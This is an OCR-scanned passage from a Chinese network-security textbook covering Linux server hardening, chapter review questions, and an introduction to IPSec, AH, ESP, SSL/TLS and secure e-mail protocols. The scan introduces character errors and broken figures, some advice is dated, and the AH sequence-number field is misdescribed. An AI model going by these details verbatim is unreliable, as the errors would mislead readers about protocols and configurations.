记录 数据 ， 可 以 发 现 可 疑 的 网 络 活动 ， 并 采取 措施 预先 阻止 今后 可 能 发 生 的 入 侵 行 为 。 如 
果 入 侵 行 为 已 经 实施 ， 则 可 以 利用 记录 数据 跟踪 和 识别 侵入 系统 的 黑客 。 

4. 制订 适当 的 数据 备份 计划 

没有 一 种 操作 系统 的 运转 是 百分之百 可 靠 的 ， 也 没有 一 种 安全 策略 是 万 无 一 失 的 ， 因 
此 作为 Linux 系统 管理 员 ， 必 须 为 系统 制订 适当 的 数据 备份 计划 ， 充 分 利用 磁带 机 、 光 盘 
刻录 机 、 双 机 热 备份 等 技术 手段 为 系统 保存 数据 备份 ， 使 系统 一 旦 遭 到 破坏 或 黑客 攻击 而 
发 生 瘫痪 时 ， 能 迅速 恢复 工作 ， 把 损失 降 到 最 小 。 

在 完成 Linux 系统 的 安装 以 后 应 该 对 整个 系统 进行 备份 ， 以 后 可 以 根据 这 个 备份 来 验 
证 系统 的 完整 性 ， 从 而 发 现 系统 文件 是 否 被 非法 自 改 过 。 如 果 发 生 系统 文件 已 经 被 破坏 的 
情况 ， 也 可 以 使 用 系统 备份 来 恢复 到 正常 的 状态 。 

1) CD-ROM 备份 

当前 最 好 的 系统 备份 介质 就 是 CD-ROM 光盘 ， 备 份 后 可 以 定期 将 系统 与 光盘 内 容 进 
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行 比 较 ， 以 验证 系统 的 完整 性 是 否 遭 到 破坏 。 如 果 对 安全 级 别 的 要 求 特别 高 ， 还 可 以 将 光 
盘 设置 为 可 启动 的 ， 并 且 将 验证 工作 作为 系统 启动 过 程 的 一 部 分 。 这 样 只 要 可 以 通过 光盘 
启动 ， 就 说 明 系 统 尚未 被 破坏 过 。 

如 果 创 建 了 一 个 只 读 的 分 区 ， 那 么 可 以 定期 从 光盘 映像 重新 装载 它们 。 即 使 像 /boot、 
/lib 和 /sbin 这 样 不 能 被 安装 成 只 读 的 分 区 ， 仍 然 可 以 根据 光盘 映像 来 检查 ， 甚 至 可 以 在 启 
动 时 从 另 一 个 安全 的 映像 重新 下 载 它 们 。 

2) 其 他 方式 的 备份 

虽然 /etc 中 的 许多 文件 经 常会 变化 ， 但 /etc 中 的 许多 内 容 仍 然 可 以 放 到 光盘 上 用 于 系统 
完整 性 验证 。 其 他 不 经 常 进 行 修改 的 文件 ， 可 以 备份 到 另 一 个 系统 (如 磁带 ) 或 压缩 到 一 个 
只 读 目录 中 。 这 种 办 法 可 以 在 使 用 光盘 映像 进行 验证 的 基础 上 再 进行 额外 的 系统 完整 性 
检查 。 

5. 保持 最 新 的 系统 核心 


由 于 Linux 流通 渠道 很 多 ， 而 且 经 常 有 更 新 的 程序 和 系统 补丁 出 现 ， 因 此 ， 为 了 加 强 
系统 安全 ， 一 定 要 经 常 更 新 系统 内 核 。 

Kemel 是 Linux 操作 系统 的 核心 ， 它 常 驻 内 存 ， 用 于 加 载 操作 系统 的 其 他 部 分 ， 并 实 
现 操作 系统 的 基本 功能 。 由 于 Kemel 控制 计算 机 和 网 络 的 各 种 功能 ， 因 此 ， 它 的 安全 性 对 
整个 系统 安全 至 关 重 要 。 在 设 定 Kemel 的 功能 时 ， 只 选择 必要 的 功能 ， 千 万 不 要 所 有 功能 
照 单 全 收 ， 否 则 会 使 Kemel 变 得 很 大 ， 既 占用 系统 资源 ， 也 给 黑客 留 下 可 乘 之 机 。 

在 Internet 上 常常 有 最 新 的 安全 修补 程序 ，Linux 系统 管理 员 应 该 消息 灵通 ， 经 常 光顾 
安全 新 闻 组 ， 查 阅 新 的 修补 程序 。 


6. 定期 对 Linux 网 络 进行 安全 检查 


Linux 网 络 系统 的 运转 是 动态 变化 的 ， 因 此 对 它 的 安全 管理 也 是 变化 的 ， 没 有 固定 的 
模式 ， 作 为 Linux 网 络 系统 的 管理 员 ， 在 为 系统 设置 了 安全 防范 策略 后 ， 应 定期 对 系统 进 
行 安全 检查 ， 并 尝试 对 自己 管理 的 服务 器 进行 攻击 ， 如 果 发 现 安全 机 制 中 的 漏洞 应 立即 采 
取 措施 补救 ， 不 给 黑客 以 可 乘 之 机 。 


3.3.4 加 强 Linux 网 络 服务 器 管理 


可 以 采取 以 下 措施 加 强 对 Linux 网 络 服务 器 的 管理 。 

1. 记录 对 Linux 系统 的 访问 

Linux 系统 管理 员 可 以 利用 记录 文件 和 记录 工具 记录 事件 ， 可 以 每 天 查看 或 扫描 记录 
文件 ， 这 些 文件 记录 了 系统 运行 的 所 有 信息 。 如 果 需 要 ， 还 可 以 把 高 优先 级 的 事件 提取 出 
来 传送 给 相关 人 员 处 理 ， 如 果 发 现 异 常 可 以 立即 采取 措施 。 

2. 取消 不 必要 的 服务 

大 多 数 Linux 系统 安装 后 ， 各 种 不 同 的 服务 都 被 激活 ， 如 FTP、Telnet、UUCP、ntalk 
等 。 多 数 情 况 下 ， 其 中 有 些 服 务 很 少 会 用 到 ， 让 它们 处 于 活动 状态 就 像 把 窗户 打开 让 盗贼 
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有 机 会 溜 进 来 一 样 。 一 般 来 说 ， 除 了 HTTP、SMTP、Telnet 和 FTP 之 外 ， 其 他 服务 都 应 该 
取消 ， 诸 如 简单 文件 传输 协议 TFTP、 网 络 邮件 存储 及 接收 所 用 的 IMAP/IPOP 传输 协议 、 
搜索 资料 用 的 Gopher 以 及 用 于 时 间 同 步 的 Daytime 和 Time 等 。 
区 消 不 必要 服务 的 方法 就 是 检查 /etc/inetd.conf 文件 ， 在 不 要 的 服务 前 加 上 “#” 号 ， 
然后 重启 INETD 后 台 程 序 ， 从 而 禁用 它们 。 另 外 ， 一 些 服务 (如 数据 库 服 务 器 ) 可 能 在 开机 
过 程 中 默认 启动 ， 可 以 通过 编辑 /etc/rc.d/* 目 录 等 级 禁用 这 些 服 务 。 许 多 有 经 验 的 管理 员 禁 
用 了 所 有 系统 服务 ， 只 留 下 SSH 通信 端口 。 
3. 慎 用 Telnet 服务 
用 Telnet 进行 远程 登录 时 ， 用 户 名 和 用 户 密码 是 明文 传输 的 ， 这 就 有 可 能 被 在 网 上 监 
听 的 其 他 用 户 截 获 。 另 一 个 危险 是 黑客 可 以 利用 Telnet 登录 系统 ， 如 果 同 时 获取 了 超级 用 
户 密码 ， 则 对 系统 的 危害 将 是 灾难 性 的 。 因 此 ， 如 果 不 是 特别 需要 ， 不 要 开放 Telnet 服 
务 。 如 果 一 定 要 开放 Telnet 服务 ， 应 该 要 求 用 户 用 特殊 的 工具 软件 进行 远程 登录 ， 这 样 就 
可 以 在 网 上 传送 加 密 过 的 用 户 密码 ， 以 免 密码 在 传输 过 程 中 被 黑客 截获 。 

还 有 一 些 报告 系统 状态 的 服务 ， 如 Finger、Efinger、Systat 和 Netstat 等 ， 虽 然 对 系统 
查 错 和 寻找 用 户 非常 有 用 ， 但 也 给 黑客 提供 了 方便 之 门 。 例 如 ， 黑 客 可 以 利用 Finger 服务 
查找 用 户 的 电话 、 使 用 目录 以 及 其 他 重要 信息 。 因 此 ， 很 多 Linux 系统 将 这 些 服 务 全 部 或 
部 分 取消 ， 以 增强 系统 的 安全 性 。 

INETD 除了 利用 /etc/inetd.conf 设置 系统 服务 项 之 外 ， 还 利用 /etc/services 文件 查找 各 项 
服务 所 使 用 的 端口 。 因 此 ， 用 户 必 须 仔细 检查 该 文件 中 各 端口 的 设 定 ， 以 免 有 安全 漏洞 。 

在 Linux 中 有 两 种 不 同 的 服务 形态 : 一 种 是 仅 在 有 需要 时 才 执 行 的 服务 ， 如 Finger 服 
务 ; 另 一 种 是 一 直 在 执行 的 永 不 停顿 的 服务 。 这 类 服务 在 系统 启动 时 就 开始 执行 ， 因 此 不 
能 靠 修 改 INETD 来 停止 其 服务 ， 而 只 能 从 修改 /etc/re.d/rc[n].d/ 文 件 或 用 Run Level Editor 
去 修改 它 。 提 供 文 件 服务 的 NFS 服务 器 和 提供 NNTP 新 闻 服 务 的 news 都 属于 这 类 服务 ， 
如 果 没 有 必要 ， 最 好 取消 这 些 服务 。 

4. 合理 设置 NFS 服务 和 NIS 服务 


NFS(Network File System) 服 务 允 许 工作 站 通过 网 络 共享 一 个 或 多 个 服务 器 输出 的 文 
件 。 但 对 于 配置 不 安全 的 NFS 服务 器 来 讲 ， 用 户 不 经 登录 就 可 以 阅读 或 者 更 改 存储 在 NFS 
服务 器 上 的 文件 ， 使 得 NFS 服务 器 很 容易 受到 攻击 。 如 果 一 定 要 提供 NFS 服务 ， 要 确保 
NFS 服务 器 支持 Secure RPC(Secure Remote Procedure Call)， 以 便利 用 DES(Data Encryption 
Standard) 加 密 算法 和 指数 密 钥 交换 (Exponential Key Exchange) 技 术 验 证 每 个 NFS 请 求 的 用 
户 身 份 。 

NIS(Network Information System) 服 务 是 一 个 分 布 式 数据 处 理 系统 ， 它 使 网 络 中 的 计算 
机 通过 网 络 共享 passwd 文件 、group 文件 、 主 机 表 文 件 和 其 他 共享 的 系统 资源 。NIS 服务 
也 有 漏洞 ， 在 NIS 系统 中 ， 亚 意 用 户 可 以 利用 自己 编写 的 程序 模仿 Linux 系统 中 的 ypserv 
响应 ypbind 的 请 求 ， 从 而 截获 用 户 的 密码 。 因 此 ，NIS 的 用 户 一 定 要 使 用 ypbind 的 secure 
选项 ， 并 且 不 接受 端口 号 小 于 1024( 非 特权 端口 ) 的 ypserv 响应 。 


.(82\， 


第 3 章 ， 操 作 系统 安全 技术 妇 A u 


5. 小 心 配置 FTP 服务 


FTP 服务 的 用 户 名 和 用 户 密码 也 是 明文 传输 的 。 因 此 ， 为 系统 的 安全 考虑 ， 必 须 禁 止 
root、bin、daemon、adm 等 特殊 用 户 对 FTP 服务 器 进行 远程 访问 ， 限 制 某 些 主机 不 能 连 入 
FTP 服务 器 ， 如 果 开放 匿名 FTP 服务 ， 则 任何 人 都 可 以 下 载 文件 (有 时 还 可 以 上 传 文件 )， 
因此 ， 除 非特 别 需 要 一 般 应 禁止 匿名 FTP 服务 。 


6. 合理 设置 POP3 和 Sendmail 等 电子 邮件 服务 


对 一 般 的 POP3 服务 来 讲 ， 电 子 邮 件 用 户 的 口令 是 按 明 文 方式 传送 到 网 络 中 的 ， 黑 客 
可 以 轻易 截获 用 户 名 和 用 户 密码 。 要 想 解决 这 个 问题 ， 必 须 安装 支持 加 密 传送 密码 的 POP3 
服务 器 ( 即 支持 Authenticated POP 命令 )， 这 样 用 户 在 往 网 络 中 传送 密码 之 前 可 以 先 对 密码 
加 密 。 

老 版 本 的 Sendmail 邮件 服务 器 程序 存在 安全 隐患 ， 为 确保 邮件 服务 器 的 安全 ， 应 尽 可 
能 安装 已 消除 安全 隐患 的 最 新 版 的 Sendmail 服务 器 软件 。 


7. 加 强 对 WWW 服务 器 的 管理 、 提 供 安全 的 WWW 服务 


当 一 个 基于 Linux 系统 的 网 站 建立 好 之 后 ， 绝 大 部 分 用 户 是 通过 Web 服务 器 ， 利 用 
WWW 浏览 器 对 网 络 进行 访问 ， 因 此 必须 特别 重视 Web 服务 器 的 安全 ， 无 论 采 用 哪 种 基 
于 HTTP 协议 的 Web 服务 器 软件 ， 都 要 特别 关注 CGI(Common Gateway Interface) 脚 本 。 

CGI 脚本 是 可 执行 程序 ， 一 般 存放 在 Web 服务 器 的 CGI-BIN 目录 下 面 ， 在 配置 Web 服务 
器 时 ， 要 保证 CGI 可 执行 脚本 只 存放 于 CGI-BIN 目录 中 。 


8. 最 好 禁止 提供 Finger 服务 


在 Linux 系统 下 ， 使 用 finger 命令 ， 可 以 显示 本 地 或 远程 系统 中 目前 已 登录 用 户 的 详 
细 人 信息， 黑客 可 以 利用 这 些 信息 增 大 侵入 系统 的 机 会 。 为 了 系统 的 安全 ， 最 好 禁止 提供 
Finger 服务 ， 即 从 /usr/bin 下 删除 Finger 命令 。 如 果 要 保留 Finger 服务 ， 应 将 Finger 文件 
换 名 ， 或 修改 权限 为 只 允许 root 用 户 执行 Finger 命令 。 

由 于 Linux 操作 系统 使 用 广泛 ， 又 公开 了 源码 ， 因 此 是 被 广大 计算 机 用 户 研究 得 最 彻 
底 的 操作 系统 ， 而 Linux 本 身 的 配置 又 相当 复杂 ， 按 照 前 面 的 安全 策略 和 保护 机 制 ， 可 以 
将 系统 的 风险 降 到 最 低 ， 但 不 可 能 彻底 消除 安全 漏洞 ， 作 为 Linux 系统 的 管理 员 ， 一 定 要 
有 安全 防范 意识 ， 定 期 对 系统 进行 安全 检查 ， 发 现 漏洞 要 立即 采取 措施 ， 不 给 黑客 以 可 乘 
之 机 。 


复习 思考 题 三 


一 、 单 选 题 

网 络 访问 控制 可 分 为 自主 访问 控制 和 强制 访问 控制 两 大 类 。_@ 是 指 由 系统 对 用 户 所 
创建 的 对 象 进行 统一 的 限制 性 规定 。_@ 是 指 由 系统 提供 用 户 有 权 对 自身 所 创建 的 访问 对 
象 进行 访问 ， 并 可 将 对 这 些 对 象 的 访问 权 授 予 其 他 用 户 和 从 授予 权限 的 用 户 收回 其 访问 权 
限 。 用 户 名 /口令 、 权 限 安 全 、 属 性 安全 等 都 属于 @ 。 
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( ”) Q@ A. 服务 器 安全 控制 。” B. 检测 和 锁定 控制 
C. 自主 访问 控制 D. 强制 访问 控制 
( ”) @ A. 服务 器 安全 控制 B. 检测 和 锁定 控制 
C. 自主 访问 控制 D. 强制 访问 控制 
( ”) @ A. 服务 器 安全 控制 B. 检测 和 锁定 控制 
C. 自主 访问 控制 D. 强制 访问 控制 
二 、 填 空 题 
1. Windows NT 四 种 域 模型 为 单 域 模型 、 、 多 主 域 模型 和 模型 。 
2. 使 用 特殊 技术 对 系统 进行 攻击 ， 以 便 得 到 有 针对 性 的 信息 就 是 一 种 攻击 。 
3 攻击 是 指 通过 向 程序 的 缓冲 区 写 入 超出 其 长 度 的 内 容 ， 从 而 破坏 程 
序 的 堆栈 ， 使 程序 转 而 执行 其 他 的 指令 ， 以 达到 攻击 的 目的 。 
4. Windows NT 的 安全 管理 主要 包括 、 用 户 权 限 规 则 、 和 域 管 
理 机 制 等 。 
三 、 简 答题 


(ea. 


2. 漏洞 对 操作 系统 有 什么 影响 ? 

3. 操作 系统 为 什么 会 有 安全 问题 ? 

4. 什么 是 访问 控制 ? 

5. Windows Server 2003 如 何 设 置 安全 的 密码 ? 
6. Windows Server 2003 如 何 实现 身份 认证 ? 
7. Linux 网 络 系统 可 能 受到 的 攻击 有 哪些 ? 

8. Linux 网 络 系统 如 何 实现 单一 登录 ? 
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学 习 目 标 
系统 学 习 网 络 安全 协议 的 概念 、 特 点 及 分 类 ; 学 习 数据 链 路 层 安 全 协议 、 网 络 层 安 全 
协议 、 传 输 层 安全 协议 等 方面 ， 介 绍 了 各 层 协 议 的 安全 缺陷 、 易 受到 的 攻击 以 及 在 相应 层 
协议 中 所 增强 的 安全 机 制 。 通 过 对 本 章 内 容 的 学 习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 
@ 掌握 IPSec 协议 的 安全 体系 结构 和 应 用 ，SSL 协议 、TLS 协议 。 
@ 了 解 安全 关联 的 基本 特性 、 服 务 功能 和 组 合 使 用 ; SSL 协议 安全 性 分 析 、 握 手 协 
议 的 安全 性 、 记 录 协 议 的 安全 性 ; VPN 关键 技术 和 实现 技术 。 


4.1 安全 协议 概述 


凡 络 安全 协议 是 营造 网 络 安全 环境 的 基础 ， 是 构建 安全 网 络 的 关键 技术 。 设 计 并 保证 
网 络 安全 协议 的 安全 性 和 正确 性 能 够 从 基础 上 保证 网 络 安 全 ， 避 免 因 网 络 安全 等 级 不 够 而 
导致 网 络 数据 信息 丢失 或 文件 损坏 等 信息 泄露 问题 。 在 计算 机 网 络 应 用 中 ， 人 们 对 计算 机 
通信 的 安全 协议 进行 了 大 量 的 研究 ， 以 提高 网 络 信息 传输 的 安全 性 。 


4.1.1 几 种 常见 安全 协议 简介 


网 络 安全 协议 主要 包括 网 络 层 协议 IPSec( 如 认证 头 协议 AH、 封 装 安全 载荷 协议 
ESP)、 安 全 套 接口 层 ( 介 于 传输 层 和 应 用 层 之 间 )SSL(Secure Socket Layer)、 应 用 层 协 议 安 全 
电子 交易 SET(Secure Electronic Transaction) 协 议 、 安 全 多 用 途 Internet 邮件 扩展 (S/MIME) 
以 及 PGP(Pretty Good Privacy) 加 密 等 。1996 年 IETF 开发 的 IPSec(Intermet Protocol Security) 
是 一 个 用 于 保证 通过 IP 网 络 进行 安全 秘密 通信 的 开放 式 标准 框架 。IPSec 实现 了 网 络 层 的 
加 密 和 认证 ， 提 供 端 到 端的 安全 解决 方案 。IPSec 联合 使 用 多 种 安全 技术 ， 包 括 两 种 协 
议 ， 一 个 是 认证 头 (Authentication Header，AH) 协 议 ， 另 一 个 是 封装 安全 载荷 (Encapsulating 
Security Payload，ESP) 协 议 。1994 年 Netscape 最 先 提出 的 安全 套 接 字 协议 层 SSL 是 一 种 
基于 会 话 、 加 密 和 认证 的 Internet 协议 ， 目 的 是 在 两 实体 (客户 和 服务 器 ) 之 间 提 供 一 个 安全 
的 通道 。 安 全 电子 交易 SET 为 保护 在 Intemet 电子 商务 交易 中 使 用 的 支付 卡 免 遭 欺诈 提供 
了 框架 。SET 通过 保证 持 卡 人 数据 的 保密 性 和 完整 性 及 一 种 认证 机 制 来 保护 支付 卡 。 


4.1.2 ”网 络 各 层 相 关 的 安全 协议 


1. 网 络 层 协议 

在 网 络 层 提供 安全 服务 具有 透明 性 ， 它 的 密 钥 协商 开销 相对 来 说 很 小 。 对 任何 传输 
层 协议 都 能 为 其 “无 颖 ”地 提供 安全 保障 ， 可 以 以 此 为 基础 构建 虚拟 专用 网 VPN 和 企业 
内 部 网 Intranet。IPSec 协议 艇 : Intermet Protocol Security 是 IETF 为 了 在 IP 层 提供 通信 安 
全 而 制订 的 一 套 协 议 徐 。 它 包括 安全 协议 部 分 和 密 钥 协商 部 分 。 安 全 协议 部 分 定义 了 对 通 
信 的 安全 保护 机 制 ， 密 钥 协 商 部 分 定义 了 如 何 为 安全 协议 协商 保护 参数 以 及 如 何 对 通信 实 
体 的 身份 进行 鉴别 。 安 全 协议 部 分 给 出 了 封装 安全 载荷 (Encapsulation Security Payload， 
ESP) 和 鉴别 头 (Authentication Header，AH) 两 种 通信 保护 机 制 。 其 中 ESP 机 制 为 通信 提供 
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机 密 性 和 完整 性 保护 ，AH 机 制 为 通信 提供 完整 性 保护 。 密 钥 协 商 部 分 使 用 代 E(Internet 
Key Exchange) 协 议 实 现 安全 协议 的 自动 安全 参数 协商 。 

2. 传输 层 协 议 

在 传输 层 不 需要 强制 为 每 个 应 用 作 安 全 方面 的 改进 ， 它 能 够 为 不 同 的 通信 应 用 配置 不 
同 的 安全 策略 和 密 钥 。 基 于 安全 套 接 层 协 议 SSL 和 传输 层 安全 TLS 的 SSL/TLS 协议 是 建 
立 在 可 靠 连接 (如 TCP) 之 上 的 一 个 能 够 防止 偷 听 、 算 改 和 消息 伪造 等 安全 问题 的 协议 。 
SSL 是 分 层 协议 ， 它 对 上 层 传 下 来 的 数据 进行 分 片 一 压缩 一 计算 MAC 一 加 密 ， 然 后 数据 
发 送 ; 对 收 到 的 数据 则 经 过 解密 一 验证 一 解压 一 重组 之 后 再 分 发 给 上 层 的 应 用 程序 ， 完 成 
一 次 加 密 通信 过 程 。 

3. 应 用 层 协议 

在 应 用 层 以 用 户 为 背景 执行 ， 因 此 更 容易 访问 用 户 凭据 ， 如 私人 密 钥 。 对 用 户 想 保护 
的 数据 具有 完整 的 访问 权 ， 应 用 可 自由 扩展 ， 不 必 依 赖 操作 系统 来 提供 。 

1) 电子 邮件 安全 协议 

(1) PGP(Pretty Good Privacy) 是 端 到 端 安全 邮件 标准 ， 既 是 一 种 规范 也 是 一 种 应 用 。 
PGP 是 一 个 完整 的 电子 邮件 安全 软件 包 ， 它 包含 4 个 密码 单元 ， 即 对 称 加 密 算 法 、 非 对 称 
加 密 算法 、 单 向 散 列 算法 以 及 随机 数 产生 器 。 它 的 特点 是 通过 单 向 散 列 算法 对 邮件 体 进行 
签名 ， 以 保证 邮件 体 无 法 修改 ， 使 用 对 称 和 非 对 称 密码 相 结 合 的 技术 保证 邮件 体 保密 且 不 
可 抵赖 。 通 信 双 方 的 公 钥 发 布 在 公开 的 地 方 ， 如 FTP 站 点 ， 而 公 钥 本 身 的 权威 性 则 可 由 第 
三 方 进行 签名 认证 。 

(2) S/MIME(Secure/Multipurpose Internet Mail Extension) 是 传输 层 安全 邮件 标准 。 
S/MIME 集成 了 3 类 标准 ， 即 MIME、 加 密 消息 语法 标准 和 证 书 请 求 语法 标准 。S/MIME 
与 PGP 主要 有 两 点 不 同 : 它 的 认证 机 制 依赖 于 层次 结构 的 证 书 认 证 机 构 ， 所 有 下 一 级 的 组 
织 和 个 人 的 证 书 由 上 一 级 的 组 织 负责 认证 ， 而 最 上 一 级 的 组 织 ( 根 证 书 ) 之 间 相 互 认证 ， 整 
个 信任 关系 基本 是 树 状 的 。 还 有 ，S/MIME 将 信件 内 容 加 密 签名 后 作为 特殊 的 附件 传送 ， 
它 的 证 书 格式 采用 X.509 V3 相符 的 公 钥 证 书 。 

2) SET 协议 

SET 被 设计 为 开放 的 电子 交易 信息 加 密 和 安全 规范 ， 可 为 Intemet 公 网 上 的 电子 交易 
提供 整套 安全 解决 方案 : 确保 交易 信息 的 保密 性 和 完整 性 ， 确 保 交 易 参 与 方 身份 的 合法 
性 ; 确保 交易 的 不 可 抵赖 性 。SET 本 身 不 是 一 个 支付 系统 ， 而 是 一 个 安全 协议 和 格式 规范 
的 集合 。 


4.2 IPSec 协议 
4.2.1 IPSec 概述 


1. IPSec 的 工作 原理 
设计 IPSec 是 为 了 给 IPv4 和 IPv6 数据 提供 高 质量 的 、 可 互 操作 的 、 基 于 密码 学 的 安 
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全 性 。IPSec 通过 使 用 两 种 通信 安全 协议 来 达到 这 些 目 标 : 认证 头 (AHD 和 封装 安全 载荷 
(ESP)， 以 及 像 Intermet 密 钥 交换 (IKE) 协 议 这 样 的 密 钥 管理 过 程 和 协议 来 达到 这 些 目 标 。 

IP AH 协议 提供 数据 源 认 证 、 无 连接 的 完整 性 以 及 一 个 可 选 的 抗 重 放 服务 。ESP 协议 
提供 数据 保密 性 、 有 限 的 数据 流 保密 性 、 数 据 源 认 证 、 无 连接 的 完整 性 以 及 抗 重 放 服务 。 
对 于 AH 和 ESP 都 有 两 种 操作 模式 ， 即 传输 模式 和 隧道 模式 。IKE 协议 用 于 协商 AH 和 
ESP 所 使 用 的 密码 算法 ， 并 将 算法 所 需要 的 密 钥 放 在 合适 的 位 置 。 

IPSec 所 使 用 的 协议 被 设计 成 与 算法 无 关 的 。 算 法 的 选择 在 安全 策略 数据 库 (SPD) 中 指 
定 。IPSec 允许 系统 或 网 络 的 用 户 和 管理 员 控 制 安全 服务 提供 的 粒度 。 通 过 使 用 安全 关联 
(SA)，IPSec 能 够 区 分 对 不 同 数据 流 提供 的 安全 服务 。 

IPSec 本 身 是 一 个 开放 的 体系 ， 随 着 网 络 技术 的 进步 和 新 的 加 密 、 验 证 算法 的 出 现 ， 
通过 不 断 加 入 新 的 安全 服务 和 特性 ，IPSec 就 可 以 满足 未 来 对 于 信息 安全 的 需要 。 随 着 互 
联网 络 技 术 的 不 断 进步 ，IPSec 作为 网 络 层 安全 协议 ， 也 在 不 断 改 进 和 增加 新 的 功能 。 其 
实在 IPSec 的 框架 设计 时 就 考虑 过 系统 扩展 问题 。 例 如 ， 在 ESP 和 AH 的 文档 中 定义 有 协 
议 、 报 头 格式 以 及 它们 提供 的 服务 ， 还 定义 有 数据 报 的 处 理 规则 ， 但 是 没有 指定 用 来 实现 
这 些 能 力 的 具体 数据 处 理 算法 。AH 默认 的 、 强 制 实施 的 加 密 MAC 是 HMAC-MD5 和 
HMAC-SHA， 在 实施 方案 中 其 他 的 加 密 算法 DES-CBC、CAST-CBC 以 及 3DES-CBC 等 
都 可 以 作为 加 密 器 使 用 。 


2. IPSec 与 安全 关联 SA 


1998 年 11 月 公布 了 因特网 网 络 层 安全 的 系列 RFC[RFC 240 1] 一 1411][W-IPsec]。 其 中 
最 重要 的 就 是 描述 IP 安全 体系 结构 的 [RFC 2401] 和 提供 IPSec 协议 簇 概述 的 [RFC 2411]。 
IP 安全 (IP Security) 体 系 结构 简称 IPSec， 是 IETF IPSec 工作 组 于 1998 年 制订 的 一 组 基于 
密码 学 的 安全 的 开放 网 络 安全 协议 。IPSec 工作 在 王 层 ， 为 耳 层 及 其 上 层 协议 提供 保护 。 

网 络 层 保密 是 指 所 有 在 人 P 数据 报 中 的 数据 都 是 加 密 的 。 此 外 ， 网 络 层 还 应 提供 源 站 鉴 
别 (Source Authentication)， 即 当 目 的 站 收 到 卫 数据 报时 ， 能 确信 这 是 从 该 数据 报 的 源 耳 地 
址 的 主机 发 来 的 。 在 IPSec 中 最 主要 的 两 个 部 分 是 鉴别 首部 AH 和 封装 安全 有 效 载荷 
ESP。AH 提供 源 站 鉴别 和 数据 完整 性 ， 但 不 能 保密 。 而 ESP 比 AH 复杂 得 多 ， 它 提供 源 
站 鉴别 、 数 据 完整 性 和 保密 。 

在 使 用 AH 或 ESP 之 前 ， 先 要 从 源 主机 到 目的 主机 建立 一 条 网 络 层 的 逻辑 连接 。 此 四 
辑 连 接 叫 作 安全 关联 SA(Security Association)。 这 样 ，IPSec 就 将 传统 的 因特网 无 连接 的 网 
络 层 转换 为 具有 逻辑 连接 的 层 。 安 全 关联 是 一 个 单 向 连接 。 如 进行 双向 的 安全 通信 则 需要 
建立 两 个 安全 关联 。 一 个 安全 关联 SA 由 一 个 三 元 组 唯一 地 确定 ， 它 包括 以 下 内 容 。 

(1) 安全 协议 (使 用 AH 或 ESP) 的 标识 符 。 

(2) 此 单 向 连接 的 目的 也 地 址 。 

G) 一 个 32 位 ( 指 二 进 制 位 ， 下 同 ) 的 连接 标识 符 ， 称 为 安全 参数 索引 SPI(Security Parameter 
Index)。 

对 于 一 个 给 定 的 安全 关联 SA， 每 一 个 PSec 数据 报 都 有 一 个 存放 SPI 的 字段 。 通 过 此 
SA 的 所 有 数据 报 都 使 用 同样 的 SPI 值 。 
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3. 鉴别 首部 AH 


鉴别 首部 AH 插 在 原 数据 报 数据 部 分 的 前 面 ， 并 将 卫 首部 的 协议 字段 置 为 51， 见 图 
4.1。 在 传输 过 程 中 ， 中 间 的 路 由 器 都 不 查看 AH 首部 。 当 数据 报到 达 目 的 站 时 ， 目 的 站 主 
机 才 处 理 AH 字段 ， 以 鉴别 源 主机 和 检查 数据 报 的 完整 性 [RFC 2402]。 

AH 首部 具有 以 下 的 一 些 字段 。 

(1) 下 一 个 首部 (8 位 )。 标 志 紧 接着 本 首部 的 下 一 个 首部 的 类 型 (如 TCP 或 UDP)。 

(2) 有 效 载荷 长 度 (8 位 )。 即 鉴别 数据 字段 的 长 度 ， 以 32 位 字 为 单位 。 

(3) 安全 参数 索引 SPI(32 位 )。 标 志 一 个 安全 关联 。 

(4) 序号 (32 位 )。 鉴 别 数据 字段 的 长 度 ， 以 32 位 字 为 单位 。 

(5) 保留 (16 位 )。 为 今后 用 。 

(6) 鉴别 数据 (可 变 )。 为 32 位 字 的 整数 倍 ， 它 包含 了 经 数字 签名 的 报 文摘 要 (对 原来 的 
数据 报 进行 报 文摘 要 运算 )。 因 此 ， 可 用 来 鉴别 源 主 机 和 检查 卫 数据 报 的 完整 性 。 


7 
可 鉴别 的 IP 数 据 报 


4.1 AH 首部 的 安全 数据 报 中 的 位 置 


4. 封装 安全 有 效 载 荷 ESP 


在 ESP 首部 ， 有 标识 一 个 安全 关联 的 安全 参数 索引 SPI(32 位 ) 和 序号 (32 位 )。 在 ESP 
尾部 有 下 一 个 首部 (8 位 ， 作 用 和 AH 首部 一 样 )。ESP 尾部 和 原来 数据 报 的 数据 部 分 一 起 进 
行 加 密 ， 见 图 4.2， 攻 击 者 无 法 得 知 所 使 用 的 运输 层 协议 。ESP 的 鉴别 数据 和 AH 中 的 鉴别 
数据 是 一 样 的 。 因 此 ， 用 ESP 封装 的 数据 报 既 有 鉴别 源 站 和 检查 数据 报 完整 性 的 功能 ， 又 
能 提供 保密 。 


性 
| 一 一 加 密 的 部 分 


TCP/UDP 报 文 


| Pr 
可 鉴别 的 保密 的 IP 数据 


4.2 在 IP 数据 报 中 的 ESP 各 字段 
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4.2.2 IPSec 的 安全 体系 结构 


IPSec 在 传输 层 之 下 ， 对 应 用 程序 和 终端 用 户 来 说 是 透明 的 。 当 在 路 由 器 或 防火 墙 上 
安装 IPSec 时 ， 无 需 更 改 用 户 或 服务 器 系统 中 的 软件 设置 。 即 使 在 终端 系统 中 执行 IPSec， 
应 用 程序 之 类 的 上 层 软 件 也 不 会 受到 影响 。IPSec 提供 访问 控制 、 无 连接 的 完整 性 、 数 据 
来 源 验证 、 防 重 放 保护 、 保 密 性 、 自 动 密 钥 管理 等 安全 服务 。IPSec 独立 于 算法 ， 并 人 允许 
用 户 (或 系统 管理 员 ) 控 制 所 提供 的 安全 服务 粒度 。 比 如 可 以 在 两 台 安 全 网 关 之 间 创 建 一 条 
承载 所 有 流量 的 加 密 隧道 ， 也 可 以 在 穿越 这 些 安全 网 关 的 每 对 主机 之 间 的 每 条 TCP 连接 间 
建立 独立 的 加 密 隧道 。 

IPSec 是 Internet 工程 任务 组 (IETF) 定 义 的 一 种 协议 套件 ， 由 一 系列 协议 组 成 ， 包 括 验 
证 头 AH、 封 装 安全 载荷 ESP、Internet 安全 关联 和 密 钥 管理 协议 ISAKMP 的 Internet IP 安 
全 解释 域 (DOI)、ISAKMP、Internet 密 钥 交换 (IKE)、 卫 安全 文档 指南 、OAKLEY 密 钥 确定 
协议 等 ， 它 们 分 别 发 布 在 RFC2401 一 RFC2412 的 相关 文档 中 。 图 4.3 显示 了 IPSec 的 体系 
